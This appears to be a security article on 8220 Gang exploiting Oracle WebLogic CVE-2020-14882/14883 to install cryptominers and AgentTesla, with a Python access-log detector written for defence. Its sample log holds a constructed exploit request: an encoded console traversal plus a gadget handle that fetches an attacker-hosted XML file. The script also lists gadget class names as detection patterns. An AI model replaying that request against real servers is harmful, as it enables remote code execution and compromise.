8220 Gang, a financially motivated Chinese threat actor known for its cryptojacking activity, has been observed by researchers exploiting CVE-2020-14883, a remote code execution (RCE) vulnerability in Oracle WebLogic Server. The attackers appear to be using the vulnerability to deploy cryptojacking malware on the compromised servers.
CVE-2020-14883 allows remote code execution through a gadget chain, but only for an attacker who can already reach the WebLogic Administration Console, which normally means an authenticated user. On its own it is therefore a post-authentication bug; in practice it is chained with CVE-2020-14882, an authentication bypass in the same console, which turns the pair into unauthenticated RCE, or it is exploited with leaked, stolen or weak console credentials. Both flaws were fixed in Oracle's October 2020 Critical Patch Update, so exposed, unpatched consoles are the targets here.
Once the console is reachable, the attackers make the server fetch a specially crafted XML file from attacker-controlled infrastructure; the gadget chain parses that file and executes the commands it specifies on the server. This serves as the gateway for the rest of the intrusion, culminating in the deployment of malware such as the AgentTesla information stealer alongside the cryptocurrency-mining payloads the group is known for. An outbound HTTP request for an XML file originating from the WebLogic server process is therefore a useful detection point in its own right.
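The chain described above leaves a recognisable trace in the web server access log: a double-URL-encoded path traversal from an unauthenticated static directory back to `console.portal` (the CVE-2020-14882 bypass) followed by a `handle=` parameter naming one of the publicly documented gadget classes for CVE-2020-14883, with the XML file's URL as its argument. The script below is an added example written for this article, not code from the researchers' report or from 8220 Gang's tooling; it parses constructed Combined Log Format lines (RFC 5737 addresses and the file name `poc.xml` are made up for the sample) and flags each stage of the chain. The gadget class names are the ones published for CVE-2020-14883; the detection does not depend on which one a given attacker uses.

```python
"""Flag WebLogic console exploitation attempts in access-log text.

Added example: detects the CVE-2020-14882 traversal bypass and the
CVE-2020-14883 gadget handle (with its remote XML URL) per request.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Gadget classes publicly documented for CVE-2020-14883's `handle` parameter.
GADGET_CLASSES = (
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
    "com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext",
    "com.tangosol.coherence.mvel2.sh.ShellSession",
)

# Combined Log Format: ip ident user [ts] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample (not real traffic): a legitimate login page hit, the
# bypass probe, the gadget request fetching an XML file, and unrelated noise.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2023:10:14:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4931
203.0.113.7 - - [12/Dec/2023:10:14:05 +0000] "GET /console/css/%252e%252e/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 12011
203.0.113.7 - - [12/Dec/2023:10:14:09 +0000] "POST /console/css/%252e%252e/console.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://203.0.113.7/poc.xml%22) HTTP/1.1" 200 302
198.51.100.4 - - [12/Dec/2023:10:15:00 +0000] "GET /app/index.html HTTP/1.1" 200 512
"""


def fully_decode(value, rounds=3):
    """URL-decode until stable: the bypass double-encodes '.' as %252e."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(target):
    """Return a list of finding strings for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    path = fully_decode(parts.path)

    # CVE-2020-14882: traversal from /console/css/ (served without auth)
    # back to console.portal, hidden from the auth filter by encoding.
    if "/console/" in path and ".." in path and path.endswith("console.portal"):
        findings.append("CVE-2020-14882: encoded traversal to console.portal")

    # CVE-2020-14883: a `handle` naming a gadget class; the argument is the
    # attacker-hosted XML file the server is told to fetch and act on.
    params = parse_qs(parts.query, keep_blank_values=True)
    for handle in params.get("handle", []):
        handle = fully_decode(handle)
        for cls in GADGET_CLASSES:
            if handle.startswith(cls):
                findings.append(f"CVE-2020-14883: gadget handle {cls.rsplit('.', 1)[-1]}")
        url = re.search(r'\(\s*["\']?(https?://[^"\')\s]+)', handle)
        if url:
            findings.append(f"remote resource referenced in handle: {url.group(1)}")
    return findings


def scan_log(text):
    """Return [(client_ip, request_target, findings)] for suspicious lines only."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in Combined Log Format
        findings = analyze_request(match.group("target"))
        if findings:
            hits.append((match.group("ip"), match.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for finding in findings:
            print("   ", finding)
```

The second log line alone already indicates someone probing the bypass; the third line, with the gadget class and an external URL in `handle`, is the point at which the server is being told to fetch the XML file, so the host in that URL is the first indicator to block and to hunt for in proxy and DNS logs.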